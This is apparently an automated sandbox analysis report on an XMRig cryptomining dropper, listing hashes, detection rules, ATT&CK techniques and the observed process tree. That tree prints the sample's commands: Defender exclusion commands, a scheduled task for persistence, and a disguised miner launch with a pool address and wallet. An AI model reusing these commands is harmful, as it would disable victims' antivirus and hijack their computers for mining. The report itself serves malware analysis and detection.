xmrig | 89d97e29a3a8e5b5f1eae6e94ad6f24c03db2cdeac0c08233dd05193ec6c8699

General

Target

file.exe
Size

1.3MB
MD5

07176d129de6501a6c733701ce76fd4e
SHA1

20837ae94fffc7cc9df911f7d0ed23cc9c877007
SHA256

89d97e29a3a8e5b5f1eae6e94ad6f24c03db2cdeac0c08233dd05193ec6c8699
SHA512

8f6325a244181b04f29d301249aa7184d582546ecf35bf00a3fd3c34219464e9bc91be42e9a87177eea9c541df494b1ad77f2f0294b741a8f5c92a570a765465
SSDEEP

12288:pG1mg2jJvz/oxbDXR4Nd9YWYaV+lmI0GNHXzvxkMHafenJ34mUw5G3riXcYwbY2p:pqmLFoP4Nr2H10m0GxKLjSKio

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/3032-210-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-211-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-212-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-214-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-215-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-216-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-217-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-218-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3032-221-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/4464-133-0x0000000000660000-0x00000000007B2000-memory.dmp	net_reactor
behavioral2/files/0x0002000000023107-176.dat	net_reactor
behavioral2/files/0x0002000000023107-177.dat	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation	RKGME.exe

Executes dropped EXE 1 IoCs

pid	Process
1508	RKGME.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4784	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1064	timeout.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3044	powershell.exe
1768	powershell.exe
1768	powershell.exe
3044	powershell.exe
3100	powershell.exe
4032	powershell.exe
3100	powershell.exe
4032	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4464	file.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	1508	RKGME.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 3044	4464	file.exe	90
PID 4464 wrote to memory of 3044	4464	file.exe	90
PID 4464 wrote to memory of 1768	4464	file.exe	87
PID 4464 wrote to memory of 1768	4464	file.exe	87
PID 4464 wrote to memory of 1964	4464	file.exe	101
PID 4464 wrote to memory of 1964	4464	file.exe	101
PID 1964 wrote to memory of 1064	1964	cmd.exe	103
PID 1964 wrote to memory of 1064	1964	cmd.exe	103
PID 1964 wrote to memory of 1508	1964	cmd.exe	104
PID 1964 wrote to memory of 1508	1964	cmd.exe	104
PID 1508 wrote to memory of 3100	1508	RKGME.exe	105
PID 1508 wrote to memory of 3100	1508	RKGME.exe	105
PID 1508 wrote to memory of 4032	1508	RKGME.exe	106
PID 1508 wrote to memory of 4032	1508	RKGME.exe	106
PID 1508 wrote to memory of 4596	1508	RKGME.exe	109
PID 1508 wrote to memory of 4596	1508	RKGME.exe	109
PID 4596 wrote to memory of 4784	4596	cmd.exe	111
PID 4596 wrote to memory of 4784	4596	cmd.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2E05.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1064
- - C:\ProgramData\BackUp\RKGME.exe
    "C:\ProgramData\BackUp\RKGME.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4032
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4596
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:4784
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      PID:3032

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BackUp\RKGME.exe

Filesize
641.0MB

MD5
80e3a09765ed43fa99d4dd849dd62d14

SHA1
c1758b249086e0d564c4bc04d567d86916f9ab27

SHA256
263a210ec8b285400f20f0f0ff509d99e473a0dce30d2670547e19004b2286d8

SHA512
ffc640207ac9aca44adfd55c94e32be477d0a23d18bd57af35ba22e96aa9f0f5872b840f6175bce0640d6772010b1c704905470de040d501e88fb501cb843259

Download Submit
C:\ProgramData\BackUp\RKGME.exe

Filesize
640.4MB

MD5
6d35ba9bbcb869791e5b166e160292d9

SHA1
781e4e3ff1854dee7f5dfacfacf87bd26d88008e

SHA256
89af2f6e335a6818e26d2b7cd837d7d34fded03f7b95e003cebdbd9bfe5a27d2

SHA512
5b723d81476ef6beb8375ea8cd2fdd18ff0c4ff68fc2be5491e7a05e1b1f5fe06b60a8d6c5394da1494990498e49316814554a6eb3a78b6e85942888c40ab71c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vicxmzxo.5ru.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2E05.tmp.bat

Filesize
140B

MD5
18683f7cccb048714b72022b9194dcf3

SHA1
e9a0409c55596e6af46179f27953c8a162f29b28

SHA256
28008c547d1737a2954ecd94c401dd32b99b3414d0f3ba17b536253917e19b7e

SHA512
7479bbc809c2e4261aba67056ce34396999827082ed7770d0b2778a7ac8ac3432255ac076e567b970b254210aef5e88114ebeeb1511275f3ca2f6d3fbe1947f7

Download Submit
memory/1508-219-0x000000001C970000-0x000000001C980000-memory.dmp

Filesize
64KB

Download
memory/1508-178-0x000000001C970000-0x000000001C980000-memory.dmp

Filesize
64KB

Download
memory/1508-179-0x0000000001730000-0x0000000001731000-memory.dmp

Filesize
4KB

Download
memory/1768-161-0x000001ABDFB60000-0x000001ABDFB70000-memory.dmp

Filesize
64KB

Download
memory/1768-159-0x000001ABDFB60000-0x000001ABDFB70000-memory.dmp

Filesize
64KB

Download
memory/1768-157-0x000001ABDFB60000-0x000001ABDFB70000-memory.dmp

Filesize
64KB

Download
memory/1768-158-0x000001ABDFB60000-0x000001ABDFB70000-memory.dmp

Filesize
64KB

Download
memory/3032-218-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-220-0x000002718C550000-0x000002718C590000-memory.dmp

Filesize
256KB

Download
memory/3032-221-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-211-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-217-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-216-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-215-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-214-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-213-0x000002718AB50000-0x000002718AB70000-memory.dmp

Filesize
128KB

Download
memory/3032-212-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3032-210-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3044-156-0x0000023BCB7A0000-0x0000023BCB7B0000-memory.dmp

Filesize
64KB

Download
memory/3044-160-0x0000023BCB7A0000-0x0000023BCB7B0000-memory.dmp

Filesize
64KB

Download
memory/3044-144-0x0000023BCB6C0000-0x0000023BCB6E2000-memory.dmp

Filesize
136KB

Download
memory/3100-200-0x0000023C66D70000-0x0000023C66D80000-memory.dmp

Filesize
64KB

Download
memory/3100-199-0x0000023C66D70000-0x0000023C66D80000-memory.dmp

Filesize
64KB

Download
memory/4032-204-0x00000242DCA30000-0x00000242DCA40000-memory.dmp

Filesize
64KB

Download
memory/4032-203-0x00000242DCA30000-0x00000242DCA40000-memory.dmp

Filesize
64KB

Download
memory/4464-150-0x000000001C260000-0x000000001C270000-memory.dmp

Filesize
64KB

Download
memory/4464-155-0x00000000010F0000-0x00000000010F1000-memory.dmp

Filesize
4KB

Download
memory/4464-133-0x0000000000660000-0x00000000007B2000-memory.dmp

Filesize
1.3MB

Download
memory/4464-168-0x000000001C260000-0x000000001C270000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads